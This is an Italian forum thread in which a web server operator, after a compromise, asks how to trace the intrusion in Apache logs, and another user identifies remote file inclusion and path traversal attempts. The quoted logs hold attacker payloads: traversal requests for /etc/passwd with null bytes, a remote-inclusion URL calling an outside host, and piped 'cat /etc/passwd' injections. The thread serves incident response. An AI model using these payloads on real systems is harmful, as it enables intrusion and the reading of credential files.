Mi hanno bucato il server

[nobadguy]

Ciao, mi hanno bucato il server, ho trovato al suo interno il load average altissimo (sopra 50) e alcuni processi perl che giravano.

In /tmp ho trovato e cancellato alcune cartelle e il problema è passato, adesso vorrei sapere come trovare nei log il punto di ingresso.

Grazie

PS. il server è debian

[Habanero]

quali servizi espone? è un web server? usi Apache? hai controllato l'access log e l'error log?

[nobadguy]

Si!

è un webserver, fornisce http, pop, smtp, webmail, ssh, mysql ai siti ospitati...


Nell'access log e nell'error log, non so cosa cercare! ecco perchè scrivo, vedo che fanno sempre strane query in GET, ma non dovrebbero essere quelle, a meno che qualche sito non abbia strani bug.

[Habanero]

cosa significa strane query? esempi?

[nobadguy]

Mettevano ad esempio in un modulo di ricerca del sito l'indirizzo di un sito web, di una precisa pagina in cui era presente solo questo codice php: <?php echo md5('just a test); ?> o altre, ma queste le vedevo con php-stats, non con i log di apache.

Io non so cosa devo cercare nei log, ecco perchè ho scritto qui!

[Habanero]

probabilmente sono tentativi di testare vulnerabilità di remote inclusion...

difficile dire cosa cercare se non hai un minimo di esperienza. Che tipo di sito ospita il web server? E' un sito tuo? ne conosci la struttura? dai log non riesci a vedere se viene richiesta qualche pagina con parametri strani?

ad esempio una richiesta del genere:

http://www.miosito.com/index.php?p=http://sitosconosciuto.com/?cmd=....

è sicuramente un tentativo di far eseguire codice esterno sulla macchina (se il codice http associato è 200 è anche andato a buon fine)
Ma le vulnerabilità possibili sono tante...

sei riuscito ad individuare più o meno il momento in cui il server è stato violato? in questo modo puoi restringere la ricerca nei log. In questo caso ti può essere d'aiuto la data e l'ora di creazione dei file Perl intrusi...

[nobadguy]

Originariamente inviato da Habanero
probabilmente sono tentativi di testare vulnerabilità di remote inclusion...

difficile dire cosa cercare se non hai un minimo di esperienza. Che tipo di sito ospita il web server? E' un sito tuo? ne conosci la struttura? dai log non riesci a vedere se viene richiesta qualche pagina con parametri strani?

ad esempio una richiesta del genere:

http://www.miosito.com/index.php?p=http://sitosconosciuto.com/?cmd=....

è sicuramente un tentativo di far eseguire codice esterno sulla macchina (se il codice http associato è 200 è anche andato a buon fine)
Ma le vulnerabilità possibili sono tante...

sei riuscito ad individuare più o meno il momento in cui il server è stato violato? in questo modo puoi restringere la ricerca nei log. In questo caso ti può essere d'aiuto la data e l'ora di creazione dei file Perl intrusi...

esperienza in questo campo no, faccio siti, in php e mysql, e sto di solito molto attento al codice che scrivo.

ad esmpio, non farei mai usare una variabile senza prima averla validata, ne controllo sempre il tipo, la lunghezza e se già ne conosco i possibile valori faccio un array con i valori consentiti e controllo con in_array.

Ma alcuni dei siti non li ho scritti io ecco perchè sono dubbioso.

ti posto un paio di righe dei miei log:

codice:

84.220.49.13 - - [02/Dec/2007:18:30:18 +0100] "GET /it/index.php?m=azienda.htm HTTP/1.1" 302 318 "http://www.google.it/search?q=volo+catania+barcellona+capodanno&hl=it&start=30&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
84.220.49.13 - - [02/Dec/2007:18:30:29 +0100] "GET / HTTP/1.1" 302 292 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
87.11.105.199 - - [02/Dec/2007:20:41:37 +0100] "GET /it/index.php?m=catalogo.htm HTTP/1.1" 302 319 "http://www.***.it/index.php?m=offerte/view_offerte.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.11.105.199 - - [02/Dec/2007:20:41:47 +0100] "GET /it/index.php?m=catalogo.htm HTTP/1.1" 302 319 "http://www.***.it/index.php?m=offerte/view_offerte.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.16.162.99 - - [02/Dec/2007:23:20:00 +0100] "GET /it/catalogo_pdf1/23_s.pdf HTTP/1.1" 302 317 "http://search.alice.it/search/cgi/search.cgi?dom=s&offset=0&hits=10&switch=0&f=us&qs=saracen+capaci&lr=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|dialno)"
65.55.212.242 - - [03/Dec/2007:03:55:34 +0100] "GET /robots.txt HTTP/1.0" 302 290 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.242 - - [03/Dec/2007:03:55:42 +0100] "GET /it/index.php?m=info_generali.htm HTTP/1.0" 302 312 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.242 - - [03/Dec/2007:03:58:29 +0100] "GET /it/index.php?m=press.htm HTTP/1.0" 302 304 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"

Gli asterischi li ho messi io per nascondere il sito indicato.
Mi dici quale è il codice 200 che potrebbe indicare che l'attacco è riuscito?

[nobadguy]

ecco un'altro po di log interessante:

codice:

66.249.73.168 - - [27/Nov/2007:03:51:09 +0100] "GET /en/index.php?m=sicilia_prestige/taormina.htm HTTP/1.1" 302 336 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=../../../../../../../../../../etc/passwd HTTP/1.1" 302 347 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=http://nullkm.tripod.com/s.txt? HTTP/1.1" 302 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 350 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=/etc/passwd%00 HTTP/1.1" 302 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=/../../../../../../../../../../etc/passwd HTTP/1.1" 302 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=/../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 351 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=/etc/passwd HTTP/1.1" 302 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=|cat+/etc/passwd| HTTP/1.1" 302 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=cat+/etc/passwd| HTTP/1.1" 302 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

per tutti la pagina ha restituito questo:

Not Found
The requested URL /it/index.php was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


--------------------------------------------------------------------------------

Apache/1.3.37 Server at www.***.it Port 80

[Habanero]

il codice di stato http si trova dopo l'indicazione della richiesta GET. Per tutte le pagine indicare lo stato e 302 che significa "FOUND - Moved Temporarily". In pratica è il classico redirect.


Nei log vedo che nel parametro "m" della querystring viene passato direttamente il nome della pagina html... questa può essere una cosa negativa, soprattutto se quella pagina viene inclusa tramite php e se il server permette le inclusioni remote. Tutto ovviamente dipende dal codice php che gestisce la pagina.

[Habanero]

Originariamente inviato da nobadguy
ecco un'altro po di log interessante:

codice:

66.249.73.168 - - [27/Nov/2007:03:51:09 +0100] "GET /en/index.php?m=sicilia_prestige/taormina.htm HTTP/1.1" 302 336 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=../../../../../../../../../../etc/passwd HTTP/1.1" 302 347 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=http://nullkm.tripod.com/s.txt? HTTP/1.1" 302 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 350 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=/etc/passwd%00 HTTP/1.1" 302 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=/../../../../../../../../../../etc/passwd HTTP/1.1" 302 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=/../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 351 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=/etc/passwd HTTP/1.1" 302 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=|cat+/etc/passwd| HTTP/1.1" 302 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.149.209.253 - - [27/Nov/2007:06:24:38 +0100] "GET /it/index.php?m=cat+/etc/passwd| HTTP/1.1" 302 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

questi sono assolutamente tentativi di attacco... che cercano di accedere a zone del filesystem al di fuori del webserver. Precisamente hanno tentato un path traversal per cercare di accede al file che memorizza le credenziali degli utenti del server.

questo invece:
GET /it/index.php?m=http://nullkm.tripod.com/s.txt?

è il tentativo di remote inclusion di cui ti parlavo.

Sinceramente non capisco perchè il server ritorni un codice di redirect 302... sto cercando di fare delle ipotesi ma sarei stato più tranquillo vedendo un 404.